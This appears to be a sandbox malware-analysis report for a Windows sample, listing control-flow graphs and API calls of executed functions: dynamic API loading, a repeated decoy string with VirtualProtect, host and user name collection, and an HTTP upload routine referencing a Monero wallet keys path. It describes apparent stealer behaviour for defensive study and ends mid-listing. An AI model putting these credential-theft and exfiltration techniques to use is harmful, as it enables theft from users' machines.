lstrcpy 15915->15916 16008 928ead CryptBinaryToStringA 16007->16008 16012 928ea9 16007->16012 16009 928ece GetProcessHeap RtlAllocateHeap 16008->16009 16008->16012 16010 928ef4 ctype 16009->16010 16009->16012 16011 928f05 CryptBinaryToStringA 16010->16011 16011->16012 16012->15853 16016->15291 16259 919880 16017->16259 16019 9198e1 16019->15298 16021 92a740 lstrcpy 16020->16021 16022 91fb16 16021->16022 16194 92a740 lstrcpy 16193->16194 16195 920266 16194->16195 16196 928de0 2 API calls 16195->16196 16197 92027b 16196->16197 16198 92a920 3 API calls 16197->16198 16199 92028b 16198->16199 16200 92a8a0 lstrcpy 16199->16200 16201 920294 16200->16201 16202 92a9b0 4 API calls 16201->16202 16203 9202b8 16202->16203 16260 91988e 16259->16260 16263 916fb0 16260->16263 16262 9198ad ctype 16262->16019 16266 916d40 16263->16266 16267 916d63 16266->16267 16279 916d59 16266->16279 16267->16279 16280 916660 16267->16280 16269 916dbe 16269->16279 16286 9169b0 16269->16286 16271 916e2a 16272 916ee6 VirtualFree 16271->16272 16274 916ef7 16271->16274 16271->16279 16272->16274 16273 916f41 16277 9289f0 2 API calls 16273->16277 16273->16279 16274->16273 16275 916f26 FreeLibrary 16274->16275 16276 916f38 16274->16276 16275->16274 16278 9289f0 2 API calls 16276->16278 16277->16279 16278->16273 16279->16262 16283 91668f VirtualAlloc 16280->16283 16282 916730 16284 916743 VirtualAlloc 16282->16284 16285 91673c 16282->16285 16283->16282 16283->16285 16284->16285 16285->16269 16287 9169d5 16286->16287 16288 9169c9 16286->16288 16287->16271 16288->16287 16289 916a09 LoadLibraryA 16288->16289 16289->16287 16290 916a32 16289->16290 16293 916ae0 16290->16293 16296 928a10 GetProcessHeap RtlAllocateHeap 16290->16296 16292 916ba8 GetProcAddress 16292->16287 16292->16293 16293->16287 16293->16292 16294 9289f0 2 API calls 16294->16293 16295 916a8b 16295->16287 16295->16294 16296->16295

                          Executed Functions

                          Function 00929860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 929860-929874 call 929750 663 929a93-929af2 LoadLibraryA * 5 660->663 664 92987a-929a8e call 929780 GetProcAddress * 21 660->664 666 929af4-929b08 GetProcAddress 663->666 667 929b0d-929b14 663->667 664->663 666->667 668 929b46-929b4d 667->668 669 929b16-929b41 GetProcAddress * 2 667->669 671 929b68-929b6f 668->671 672 929b4f-929b63 GetProcAddress 668->672 669->668 673 929b71-929b84 GetProcAddress 671->673 674 929b89-929b90 671->674 672->671 673->674 675 929b92-929bbc GetProcAddress * 2 674->675 676 929bc1-929bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,010431E0), ref: 009298A1
                          • GetProcAddress.KERNEL32(74DD0000,010430F0), ref: 009298BA
                          • GetProcAddress.KERNEL32(74DD0000,01043240), ref: 009298D2
                          • GetProcAddress.KERNEL32(74DD0000,01043180), ref: 009298EA
                          • GetProcAddress.KERNEL32(74DD0000,01043258), ref: 00929903
                          • GetProcAddress.KERNEL32(74DD0000,0104A018), ref: 0092991B
                          • GetProcAddress.KERNEL32(74DD0000,01035970), ref: 00929933
                          • GetProcAddress.KERNEL32(74DD0000,010359F0), ref: 0092994C
                          • GetProcAddress.KERNEL32(74DD0000,010431C8), ref: 00929964
                          • GetProcAddress.KERNEL32(74DD0000,01043288), ref: 0092997C
                          • GetProcAddress.KERNEL32(74DD0000,01042FE8), ref: 00929995
                          • GetProcAddress.KERNEL32(74DD0000,010432A0), ref: 009299AD
                          • GetProcAddress.KERNEL32(74DD0000,01035710), ref: 009299C5
                          • GetProcAddress.KERNEL32(74DD0000,010432B8), ref: 009299DE
                          • GetProcAddress.KERNEL32(74DD0000,010432D0), ref: 009299F6
                          • GetProcAddress.KERNEL32(74DD0000,01035830), ref: 00929A0E
                          • GetProcAddress.KERNEL32(74DD0000,01043018), ref: 00929A27
                          • GetProcAddress.KERNEL32(74DD0000,01043030), ref: 00929A3F
                          • GetProcAddress.KERNEL32(74DD0000,01035A70), ref: 00929A57
                          • GetProcAddress.KERNEL32(74DD0000,01043078), ref: 00929A70
                          • GetProcAddress.KERNEL32(74DD0000,010358B0), ref: 00929A88
                          • LoadLibraryA.KERNEL32(01043360,?,00926A00), ref: 00929A9A
                          • LoadLibraryA.KERNEL32(010432E8,?,00926A00), ref: 00929AAB
                          • LoadLibraryA.KERNEL32(01043330,?,00926A00), ref: 00929ABD
                          • LoadLibraryA.KERNEL32(010433A8,?,00926A00), ref: 00929ACF
                          • LoadLibraryA.KERNEL32(01043348,?,00926A00), ref: 00929AE0
                          • GetProcAddress.KERNEL32(75A70000,01043378), ref: 00929B02
                          • GetProcAddress.KERNEL32(75290000,01043300), ref: 00929B23
                          • GetProcAddress.KERNEL32(75290000,01043390), ref: 00929B3B
                          • GetProcAddress.KERNEL32(75BD0000,01043318), ref: 00929B5D
                          • GetProcAddress.KERNEL32(75450000,01035A10), ref: 00929B7E
                          • GetProcAddress.KERNEL32(76E90000,0104A028), ref: 00929B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00929BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00929BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                          • Instruction ID: 7149d25357b407c0fde790e44ab5615a775ae814aad6026a47980cd29816527b
                          • Opcode Fuzzy Hash: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                          • Instruction Fuzzy Hash: E9A128B5500344AFD344EFA8FD98B663BF9F78C303B14479AA705A3264DE39A841CB52
                          Function 009145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 9145c0-914695 RtlAllocateHeap 781 9146a0-9146a6 764->781 782 9146ac-91474a 781->782 783 91474f-9147a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0091479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 47ff257db9bdd3608e57acf0b1c9f06ae0e2e1cee898a5ed391489e78da35dab
                          • Instruction ID: 918dbef3517ad6b9246b7d869393c18e8d1b293abbb027930944b6306de5673a
                          • Opcode Fuzzy Hash: 47ff257db9bdd3608e57acf0b1c9f06ae0e2e1cee898a5ed391489e78da35dab
                          • Instruction Fuzzy Hash: 6A4106606C66047BE638B7A4A942EFD7B765FCA70CFA17668FA1052680CBB077014D26
                          Function 00914880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 914880-914942 call 92a7a0 call 9147b0 call 92a740 * 5 InternetOpenA StrCmpCA 816 914944 801->816 817 91494b-91494f 801->817 816->817 818 914955-914acd call 928b60 call 92a920 call 92a8a0 call 92a800 * 2 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a920 call 92a8a0 call 92a800 * 2 InternetConnectA 817->818 819 914ecb-914ef3 InternetCloseHandle call 92aad0 call 919ac0 817->819 818->819 905 914ad3-914ad7 818->905 829 914f32-914fa2 call 928990 * 2 call 92a7a0 call 92a800 * 8 819->829 830 914ef5-914f2d call 92a820 call 92a9b0 call 92a8a0 call 92a800 819->830 830->829 906 914ae5 905->906 907 914ad9-914ae3 905->907 908 914aef-914b22 HttpOpenRequestA 906->908 907->908 909 914b28-914e28 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a740 call 92a920 * 2 call 92a8a0 call 92a800 * 2 call 92aad0 lstrlen call 92aad0 * 2 lstrlen call 92aad0 HttpSendRequestA 908->909 910 914ebe-914ec5 InternetCloseHandle 908->910 1021 914e32-914e5c InternetReadFile 909->1021 910->819 1022 914e67-914eb9 InternetCloseHandle call 92a800 1021->1022 1023 914e5e-914e65 1021->1023 1022->910 1023->1022 1024 914e69-914ea7 call 92a9b0 call 92a8a0 call 92a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 0091493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00930DDB,00000000,?,?,00000000,?,",00000000,?,01050A60), ref: 00914DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00914E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49
                          • InternetCloseHandle.WININET(00000000), ref: 00914EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00914EC5
                          • HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00914B15
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • InternetCloseHandle.WININET(00000000), ref: 00914ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                          • Instruction ID: dac3edc1f8bcd7e1d41c35c523c3749dda5c2139c6d52137a5d84d4e5e8b164c
                          • Opcode Fuzzy Hash: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                          • Instruction Fuzzy Hash: BA12BD729112289BDB15EB90EC92FEEB778BF98300F504199F10662095DF702F89CF66
                          Function 009278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                          • Instruction ID: 7d0b16b6c39ab3ad93839439d107b9b07fd5387d70958cedee535278fff96341
                          • Opcode Fuzzy Hash: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                          • Instruction Fuzzy Hash: 67016DB1A04308EBC710DF98ED45BABFBB8FB48B21F10425AEA45F3280D77459448BA1
                          Function 00927850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
